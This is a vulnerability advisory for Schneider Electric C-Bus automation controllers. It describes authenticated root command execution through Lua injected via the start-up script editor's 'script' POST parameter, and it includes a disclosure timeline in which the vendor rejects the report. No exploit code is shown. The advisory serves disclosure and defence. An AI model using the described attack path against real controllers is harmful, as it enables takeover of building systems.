← Advisories

Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 Remote Root Exploit

High

Advisory ID

ZSL-2022-5707

Release Date

29 May 2022

Vendor

Schneider Electric SE - https://www.se.com

Affected Version

CLIPSAL 5500SHAC (i.MX28), CLIPSAL 5500NAC (i.MX28), SW: 1.10.0, 1.6.0, HW: 1.0, Potentially vulnerable (alternative products/same codebase?): 5500NAC2 and 5500AC2, SpaceLogic C-Bus

CVE

N/A

Tested On

CPU model: ARM926EJ-S rev 5 (v5l), GNU/Linux 4.4.115 (armv5tejl), LuaJIT 2.0.5, FlashSYS v2, nginx

Summary

The C-Bus Network Automation Controller (5500NAC) and the Wiser for C-Bus Automation Controller (5500SHAC)) is an advanced controller from Schneider Electric. It is specifically designed to unite the C-Bus home automation solution with common household communication protocols, from lighting and climate control, to security, entertainment and energy metering. The Wiser for C-Bus Automation Controller manages and controls C-Bus systems for residential homes or zones within a building and integrates functions such as heating/cooling, energy/load monitoring and remote control for C-Bus and Modbus.

Description

The automation controller suffers from an authenticated arbitrary command execution vulnerability. An attacker can abuse the Start-up (init) script editor and exploit the 'script' POST parameter to insert malicious Lua script code and execute commands with root privileges that will grant full control of the device.

Proof of Concept

c-bus.pyTXT

Disclosure Timeline

12.03.2022Vulnerability discovered.

15.03.2022Sent details to vendor.

17.03.2022Vendor creates case SE-6201, starts investigation.

25.03.2022Asked vendor for status update.

26.03.2022Vendor responds, assessment is still ongoing.

30.03.2022Vendor cannot reproduce with provided info, requests proof of execution.

31.03.2022Sent encrypted PoC script to the vendor.

31.03.2022Vendor receives PoC, starts analysis.

11.04.2022Asked vendor for confirmation and status update.

11.04.2022Vendor is still analyzing the vulnerability. Will let us know once the case is confirmed.

20.04.2022Asked vendor for confirmation and scheduled patch release date.

21.04.2022Vendor confirms SE-6201, working on action plan.

22.04.2022Vendor responds: The product team has not accepted this report as a valid vulnerability due to the following analysis: The python script mentioned in the report uses the /scada-main/scripting/ editor to execute the lua script to gain remote access to the controller. However, to achieve this, the attacker needs to provide the administrator credentials to execute the script. So, this can be done only when the attacker has the administrator credentials with him. In order to prevent attackers from obtaining administrator credentials, the product implements the following measures to make passwords difficult to brute force. Force a user to change the default password the very first time they log in to the controller. Uses of a strong password (Combination of characters with uppercase letter, lowercase letter and digit) Block access to the controller after certain wrong login attempts.

22.04.2022Replied to the vendor. Asked vendor to assign SeeVeeE.

30.04.2022Asked vendor for status update.

02.05.2022Vendor closes SE-6201 (not a vuln).

29.05.2022Public security advisory released.

Credits

Vulnerability discovered by Gjoko Krstic

References

[1]https://packetstormsecurity.com/files/167304/

[2]https://exchange.xforce.ibmcloud.com/vulnerabilities/227554

[3]https://cxsecurity.com/issue/WLB-2022050095

[4]https://www.exploit-db.com/exploits/50949

Changelog

29.05.2022Initial release

31.05.2022Added reference [1], [2] and [3]

07.06.2022Added reference [4]